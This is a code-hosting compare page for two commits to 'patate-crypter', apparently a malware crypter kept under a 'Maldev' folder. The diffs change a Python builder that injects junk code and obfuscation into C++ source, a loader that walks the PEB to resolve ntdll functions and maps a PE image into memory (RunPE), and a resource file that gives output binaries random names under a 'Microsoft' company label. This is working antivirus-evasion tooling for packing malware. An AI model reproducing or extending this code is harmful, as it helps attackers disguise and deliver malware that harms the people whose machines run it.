patate/patate-crypter
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: patate:15c8e787e296611fdd2d7907dbfbed10fbb05a95
Branches Tags
patate:master
..
compare: patate:89883c9153cfd33ba1bcdcfce337ac0faaab84c0
Branches Tags
patate:master

2 Commits
15c8e787e2 ... 89883c9153

Author SHA1 Message Date
ALittlePatate
89883c9153 fix: obfuscation in structs, output file 2025-01-19 10:03:35 +01:00
ALittlePatate
644be7fb11 add: clang integration 2024-09-24 17:14:30 +02:00
6 changed files with 32 additions and 14 deletions
Expand all files Collapse all files

2
Builder/gui.py
View File

@@ -153,7 +153,7 @@ class Ui_mainWindow(object):
if self.climode :
out_filename = self.filename.replace(".exe", "") + "_out.exe"
else :
out_filename = "../bin/" + self.filename + "_out.exe"
out_filename = "../bin/" + self.filename.replace(".exe", "") + "_out.exe"
xor_key = ''
if self.xor :

5
Builder/obfuscation.py
View File

@@ -173,6 +173,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk, is64bit) :
in_switch = False
in_asm = False
in_dowhile = False
in_struct = False
can_code = False
wait_for_func_close = False
in_debug = False
@@ -202,6 +203,8 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk, is64bit) :
elif in_switch and "}" in line and not "case" in line and not "default" in line : in_switch = False
if "__asm" in line : in_asm = True
elif in_asm and "}" in line : in_asm = False
if "struct" in line : in_struct = True
elif in_struct and "}" in line : in_struct = False
if "// Your code here" in line :
#can_code = True
pass
@@ -224,7 +227,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk, is64bit) :
b = re.search(func_def_pattern, line) != None
if not can_code :
if b or a or in_comment or in_switch or in_asm : continue # we can't write
if b or a or in_comment or in_switch or in_asm or in_struct : continue # we can't write
if GetRandomBool() and junk and k < PASS : # do we create a variable ?
out.append(GetRandomVar()+"\n")

2
Crypter/config.h
View File

@@ -1,2 +1,2 @@
#pragma once
#define KEY "ougoqugduzqd"
#define KEY ""

19
Crypter/main.cpp
View File

@@ -1,3 +1,5 @@
typedef struct IUnknown IUnknown;
#include <windows.h>
#include <cstdio>
#include <iostream>
@@ -91,13 +93,25 @@ typedef NTSTATUS (NTAPI *NtAllocateVirtualMemoryPtr)(HANDLE ProcessHandle, PVOID
typedef NTSTATUS (NTAPI *LdrLoadDllPtr)(PWCHAR, ULONG, PUNICODE_STRING, PHANDLE);
typedef NTSTATUS (NTAPI *RtlInitUnicodeStringPtr)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
typedef struct __TEB {
PVOID Reserved1[12];
PPEB ProcessEnvironmentBlock;
PVOID Reserved2[399];
BYTE Reserved3[1952];
PVOID TlsSlots[64];
BYTE Reserved4[8];
PVOID Reserved5[26];
PVOID ReservedForOle;
PVOID Reserved6[4];
PVOID TlsExpansionSlots;
} TEB_, * PTEB_;
void* get_ntfunction(const char* func) {
//START
#ifdef _M_X64
PTEB tebPtr = reinterpret_cast<PTEB>(__readgsqword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
PTEB_ tebPtr = reinterpret_cast<PTEB_>(__readgsqword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
#else
PTEB tebPtr = reinterpret_cast<PTEB>(__readfsdword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
PTEB_ tebPtr = reinterpret_cast<PTEB_>(__readfsdword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
#endif
PPEB_LDR_DATA ldrData = tebPtr->ProcessEnvironmentBlock->Ldr;
@@ -154,6 +168,7 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
return NULL;
}
DEBUG_PRINTF("[+] Allocated memory at 0x%p\n", image_base);
const IMAGE_SECTION_HEADER* section_headers = reinterpret_cast<const IMAGE_SECTION_HEADER*>(nt_headers + 1);
// Copy the section data to the allocated memory.
for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {

10
Crypter/patate-crypter.rc
View File

@@ -68,12 +68,12 @@ BEGIN
BLOCK "040c04b0"
BEGIN
VALUE "CompanyName", "Microsoft"
VALUE "FileDescription", "cixctkirmfubayfzkbog"
VALUE "FileDescription", "dnsfzllrjwhkcwdfijbb"
VALUE "FileVersion", "1.0.0.1"
VALUE "InternalName", "bcjphkt.exe"
VALUE "InternalName", "fbjriet.exe"
VALUE "LegalCopyright", "Copyright (C) 2023"
VALUE "OriginalFilename", "nybxftw.exe"
VALUE "ProductName", "txwfqte.exe"
VALUE "OriginalFilename", "pvgcwpf.exe"
VALUE "ProductName", "wisjfvx.exe"
VALUE "ProductVersion", "1.0.0.1"
END
END
@@ -83,7 +83,7 @@ BEGIN
END
END
MAINICON ICON "C:/Users/patate/Desktop/Programmation/C++/Maldev/patate-crypter/icon.ico"
//MAINICON ICON ""
#endif
/////////////////////////////////////////////////////////////////////////////

8
Crypter/patate-crypter.vcxproj
View File

@@ -29,26 +29,26 @@
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<PlatformToolset>ClangCL</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<PlatformToolset>ClangCL</PlatformToolset>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<PlatformToolset>ClangCL</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<PlatformToolset>ClangCL</PlatformToolset>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>